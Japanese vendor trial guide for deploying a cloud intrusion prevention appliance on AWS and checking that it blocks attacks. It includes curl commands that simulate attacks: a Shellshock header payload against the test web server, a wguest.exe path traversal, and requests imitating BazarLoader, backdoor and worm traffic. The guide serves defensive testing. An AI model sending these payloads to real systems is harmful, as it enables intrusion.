目次

Network Security 体験版

Network Securityの包括的な 侵入防御 System(IPS)を利用して、トラフィックをアクティブに監視し、PCI 11.4の要件を満たす支援を受けます。このクイックトライアルガイドでは、次の情報を提供します。

  • Network Security Edge保護を展開して、AWSのVPC Ingressルーティングを使用してインバウンドトラフィックとアウトバウンドトラフィックをインターセプトし、Network Security アプライアンスにルーティングして検査します。エッジ保護およびその他の展開オプションに関する詳細を参照してください。
  • CloudFormationテンプレートを使用してサンプルクラウド環境をシミュレートするWebサーバを作成します。

保護の展開

CloudFormationテンプレートを使用してテストスタックを作成するには、次の手順に従います。

  1. AWSアカウントにログインします。
  2. CloudFormationスタックを作成するには、このリンクをクリックします。
  3. 次のパラメータを適切に変更します。
  4. SSHキー: SSHキーの詳細については、AWSのドキュメント を参照してください。
  5. C1APIキー:Cloud One APIキー作成について 詳細 を確認してください。
  6. CIDR:初期設定の0.0.0.0/0では、インターネット上のすべてのユーザがEC2インスタンスにアクセスできます。IPアドレスへのアクセスを制限することを強くお勧めします。インターネットアドレスの確認の詳細については、こちら を参照してください。
  7. Create stackをクリックします。プロセスが完了するまで、十分な時間をおいてください。スタックが正常に作成されると、次のリソースが展開されます。
リソース 詳細
VPC CIDR 10.0.0.0/16
インターネットゲートウェイ エッジルートテーブルの関連付け。トラフィックを Network Security インスタンスに転送します。
サブネット 保護対象サブネット(10.0.0.0/24)
検査サブネット(10.0.1.0/24)
管理サブネット(10.0.2.0/24)
EC2インスタンス Network Security 仮想アプライアンス
Webサーバを実行しているLinuxインスタンス(テスト環境)
CloudWatch ロググループ Network Security アプライアンスのログを保存します。
NATゲートウェイ Network Security アプライアンスから Cloud One およびAWSへのトラフィックの管理に使用されます。
ルートテーブル N/A
セキュリティグループ N/A

次のアーキテクチャ図は、 Network Security Edge 展開を視覚化したものです。


注意:

このデモには、SNSトピック、 CloudWatch アラーム、 Lambda 関数などの高可用性コンポーネントは含まれていません。「 次の手順 」で説明されている Get Started ウィザードを使用して、クラウド環境でこれらのリソースを有効にします。


攻撃シミュレーション

Network Security 仮想アプライアンスによる攻撃をインターセプトしている様子を確認するには、攻撃をシミュレートする簡単なコマンドをいくつか実行します。

インバウンド攻撃

Network Securityの仮想アプライアンスは仮想パッチを提供し、既知の脆弱性に一致する入力トラフィックが確認されたときにアラートを送信することで、脆弱性のあるインフラストラクチャをインバウンド攻撃から保護します。これらの攻撃は、以下に示すように、CloudFormationスタックで展開されたWebサーバインスタンスを標的として、ローカルホストから実行できます。

  • 16798:HTTP:GNU Bash HTTPヘッダにリモートでコードが実行される脆弱性

ローカルホストのコマンドラインシェルで、Webサーバインスタンスを対象に次のコマンドを実行します。 curl -H "User-Agent: () { :; } ; /bin/eject" http://<web server ip>

アプライアンスは不審なトラフィックを検出し、要求をブロックします。攻撃のブロックに成功したことを示すログイベントも生成されます。

ログイベントを表示するには、次の手順に従います。

  1. AWSポータルで、 Services > CloudWatchに移動します。
  2. 左側のナビゲーションメニューから、Logs > Log groupsを選択します。
  3. ロググループ c1_network_security_logsで、ログストリーム ipsBlock_<instanceId>を開きます。各フィルタIDと説明に一致するエントリが表示されます。
送信攻撃

Network Securityの仮想アプライアンスは、既知の脆弱性に一致する出力トラフィックが検出されたときにアラートを発令することで、アウトバウンド攻撃から保護します。実際の動作を確認するには、CloudFormationスタックに展開されたWebサーバインスタンスから攻撃シミュレーションを実行します。 展開で指定したSSHキーを使用してインスタンスにSecure Shell(SSH)するには、ログインID「ec2-user」を使用します。

  • 1292:HTTP:wguest.exe 攻撃コード

ローカルホストのコマンドラインシェルから、Webサーバインスタンスを対象として次のコマンドを実行します。 curl 'http://www.example.org/server/cgi-bin/wguest.exe?template=c:\boot.ini'

アプライアンスは不審なトラフィックを検出し、要求をブロックします。攻撃のブロックに成功したことを示すログイベントも生成されます。

不正プログラムフィルタを使用した送信攻撃

以下のアウトバウンド攻撃シミュレーションを効率的に実行するには、最新の 脅威インテリジェンス パッケージがインストールされていることを確認する必要があります。 脅威インテリジェンス システムが最新であることを確認するには、 Network Security ホームページで Policy > Sync Management します。Sync Manually** をクリックして、最新のパッケージをダウンロードします。Network Security脅威インテリジェンスパッケージについての詳細を参照してください。


注意:アプライアンスは、以下にシミュレートするような、最新の 脅威インテリジェンス 情報を使用して攻撃を検出およびブロックします。続行する前に、同期が完了していることを確認してください。


攻撃シミュレーションを実行するには、次の手順に従います。

攻撃 方法/結果
25492:HTTP:Trojan-Downloader.Win64.BazarLoader.Aランタイム検出 Webサーバインスタンスのコマンドラインシェルから、次のコマンドを実行します。 curl -H 'User-Agent: sdvntyer' http://www.example.com/api/v88
アプライアンスは不審なトラフィックを検出し、要求をブロックします。攻撃のブロックに成功したことを示すログイベントも生成されます。
34738:HTTP:Backdoor.Shell.Dragonmuddy.Aランタイムの検出 Webサーバインスタンスのコマンドラインシェルから、次のコマンドを実行します。 curl 'http://www.example.com/includes/main.php?t=7d4580a3910c54d62b46f24c397c8d59&f=g2&type=cmd&id=D7CB4B6E5A21CA596DE0A7E10059C85E'
アプライアンスは不審なトラフィックを検出し、要求をブロックします。攻撃のブロックに成功したことを示すログイベントも生成されます。
38451:HTTP:Worm.Python.KashmirBlack.Aランタイム検出 Webサーバインスタンスのコマンドラインシェルから、次のコマンドを実行します。 curl -H 'User-Agent: ArcherGhost' -d 'post=eyJkYXRhIjogeyJkb21haW4iOiAiaHR0cDovL3RhcmdldDEyMy5jb20vYXNzZXRzL3ZlbmRvci9waHB1bml0L3BocHVuaXQvc3JjL1V0aWwvUEhQL3Nzc3AucGhwIiwgInNlcnZlciI6ICIxOTIuMTY4LjEwNy4xOSIsICJ0aXRsZSI6ICJqcSJ9LCAidHlwZSI6ICJzY2FubmVyIn0%3D' http://www.example.com/adeliap/404.php

ログイベントを表示するには、上記の手順に従ってください。


注意:イベントが CloudWatchに反映されるまでに数秒かかる場合があります。


これらの攻撃の詳細については、 Cloud Oneを参照してください。Network Securityで、PolicyIntrusion Prevention Filteringの順に選択します。検索フィールドにフィルタIDを入力すると、詳細が表示されます。

次の手順

これで、 Network Securityが提供するインバウンドおよびアウトバウンド保護を体験することができたので、次の手順を実行してクラウドインフラストラクチャを保護します。

Network Security 管理インタフェースのGet Startedウィザードを使用して、展開を開始します。これにより、クラウドアカウントから取得した情報を使用してエッジ保護をネットワークに展開する新しいCloudFormationテンプレートが生成されます。

Edgeの展開がお使いの環境に適していない場合は、AWSで利用可能なNetwork Securityのすべての展開オプションについて、詳細を確認することもできます。